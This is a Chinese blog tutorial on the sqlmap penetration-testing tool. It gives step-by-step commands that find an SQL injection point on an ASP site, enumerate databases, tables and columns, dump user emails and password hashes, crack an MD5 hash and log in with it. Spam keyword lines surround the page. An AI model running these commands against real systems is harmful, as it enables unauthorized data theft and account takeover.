91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

滲透測試工具sqlmap怎么用

發布時間:2022-01-15 09:45:37 來源:億速云 閱讀:156 作者:小新 欄目:數據庫

這篇文章主要介紹滲透測試工具sqlmap怎么用,文中介紹的非常詳細,具有一定的參考價值,感興趣的小伙伴們一定要看完!

一、檢測注入點是否可用

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134"

參數:

-u:指定注入點url

滲透測試工具sqlmap怎么用

滲透測試工具sqlmap怎么用

注入結果展示:

(1)注入參數id為GET注入,注入類型有四種分別為:boolean-based blind、error-based、stacked queries、inline query。

(2)web服務器系統為windows 2003 or XP

(3)web應用程序技術為:ASP.NET, Microsoft IIS 6.0

(4)數據庫類型為:SQLSERVER 2000

其中圖一有若干詢問語句,需要用戶輸入[Y/N],如果你懶得輸入或者不懂怎么輸入可以讓程序自動輸入,只需添加一個參數即可,命令如下:

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --batch

二、暴庫

一條命令即可曝出該sqlserver中所有數據庫名稱,命令如下:

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --dbs


參數:

--dbs:dbs前面有兩條杠,請看清楚。

滲透測試工具sqlmap怎么用

結果顯示該sqlserver中共包含7個可用的數據庫。

三、web當前使用的數據庫

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-db

滲透測試工具sqlmap怎么用

四、web數據庫使用賬戶

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-user


滲透測試工具sqlmap怎么用

五、列出sqlserver所有用戶

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --users

滲透測試工具sqlmap怎么用

六、數據庫賬戶與密碼

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --passwords

滲透測試工具sqlmap怎么用

七、列出數據庫中的表

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata --tables

參數:

-D:指定數據庫名稱

--tables:列出表

滲透測試工具sqlmap怎么用

結果體現共列出了34張表。

八、列出表中字段

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb --columns


參數:

-D:指定數據庫名稱

-T:指定要列出字段的表

--columns:指定列出字段

滲透測試工具sqlmap怎么用

結果顯示該userb表中包含了23條字段。

九、暴字段內容

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --dump

參數:

-C :指定要暴的字段

--dump:將結果導出

滲透測試工具sqlmap怎么用

如果字段內容太多,需要花費很多時間。可以指定導出特定范圍的字段內容,命令如下:

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --start 1 --stop 10 --dump

參數:

--start:指定開始的行

--stop:指定結束的行

此條命令的含義為:導出數據庫tourdata中的表userb中的字段(email,Username,userpassword)中的第1到第10行的數據內容。

滲透測試工具sqlmap怎么用

十、驗證結果

通過上圖結果看到其中的一個用戶信息為:

email:123456@qq.com

username: 1.asp

password: 49ba59abbe56e057

通過md5解密,得到該hash的原文密碼為:123456

拿到賬號密碼我們來測試是否可以登錄

滲透測試工具sqlmap怎么用

驗證成功!

以上是“滲透測試工具sqlmap怎么用”這篇文章的所有內容,感謝各位的閱讀!希望分享的內容對大家有幫助,更多相關知識,歡迎關注億速云行業資訊頻道!

向AI問一下細節
推薦閱讀:
  1. SQLMap入門
  2. sqlmap命令

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

大厂| 方正县| 秭归县| 南宫市| 托克逊县| 荃湾区| 阜康市| 海阳市| 保德县| 登封市| 沾益县| 神农架林区| 新河县| 彭泽县| 隆回县| 巴中市| 洱源县| 剑川县| 汽车| 曲周县| 二连浩特市| 吉木萨尔县| 龙江县| 长春市| 肃宁县| 新河县| 华阴市| 县级市| 志丹县| 周口市| 苗栗市| 庄河市| 晴隆县| 金山区| 科技| 秭归县| 仪征市| 五峰| 阳泉市| 虞城县| 安岳县|